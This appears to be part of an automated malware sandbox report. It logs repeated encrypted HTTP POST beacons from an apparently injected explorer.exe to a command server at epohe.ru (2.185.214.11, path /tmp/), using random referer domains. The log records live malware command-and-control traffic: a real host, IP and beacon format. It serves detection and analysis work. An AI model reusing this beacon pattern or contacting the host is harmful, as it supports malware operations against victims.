                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.6497312.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:57.640642881 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://yinxmrewdxvvup.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 189
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:57.640660048 CEST189OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 51 4e b0 92
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuQNP^@$imKBdh1F}v;;*442nB&#2l1Y4^3i\mr
                                                  Sep 2, 2024 08:20:59.249829054 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:59 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.6497332.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:59.257668972 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://iyfnrlbdswaun.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 157
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:59.257703066 CEST157OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 7e 19 d6 e2
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu~{Rtk|7e/$5afA8qF+Z3q*T,
                                                  Sep 2, 2024 08:21:00.505430937 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:00 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.6497342.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:00.513787031 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://glhjgpfospwhdw.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 154
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:00.513798952 CEST154OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 75 3f c1 e7
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuu?KMZw7ZRM'k_tA!F]C/D.<QbK
                                                  Sep 2, 2024 08:21:01.659632921 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:01 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.6497352.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:01.669356108 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://gcybmsqpemm.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 286
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:01.669368982 CEST286OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 74 2d a2 a0
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vut-U@qTip]8x~L[-XOE;M%/%cH>#PToo@sZAPB4ruQv.@eHr=_i
                                                  Sep 2, 2024 08:21:03.300298929 CEST137INHTTP/1.1 200 OK
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:03 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.6497362.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:03.307833910 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ltleqvppjdrlod.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 229
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:03.307857037 CEST229OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 21 0f a0 f7
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu!bCXzAs%N5sk;ik!ed$"/F\rMV+m/6v1SgCYQl/r0Iip\
                                                  Sep 2, 2024 08:21:04.584748030 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:04 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.6497372.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:04.828788042 CEST271OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://atmipbdihgavjw.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 291
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:04.828809023 CEST291OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 7f 30 df e6
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu0?}Lj*x0cMM;tjh24k.ZX.pTLy*n D&@!E~S~oq@l.EH%
                                                  Sep 2, 2024 08:21:05.996436119 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:05 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.6497382.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:06.005374908 CEST269OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://lefbfksalyjs.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 282
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:06.005395889 CEST282OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 35 53 cb 90
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu5ST*M]NvmCc(B<IK=z-mAu3bhC#l##|,t%^A_ *Q_97z;~boyA^7e
                                                  Sep 2, 2024 08:21:07.153987885 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:06 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.6497392.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:07.275456905 CEST270OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://wiitjtnnnvend.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 356
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:07.275480032 CEST356OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 53 40 cd e8
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuS@oOn)OC/1B{#55WBPE=GR+vb<]#pp9*cJ}Rm,,X3\&dDLP="_nut)+8
                                                  Sep 2, 2024 08:21:08.487118959 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:08 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.6497412.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:21:08.497749090 CEST269OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://rkfklwpuiufh.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 253
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:21:08.497760057 CEST253OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 55 28 ce eb
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vuU(T]Cuq(\eSc7d~'d]2x'VVTA65Sq'q`3m8ae^F:1\piF~S;m.\'u
                                                  Sep 2, 2024 08:21:09.643055916 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:21:09 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
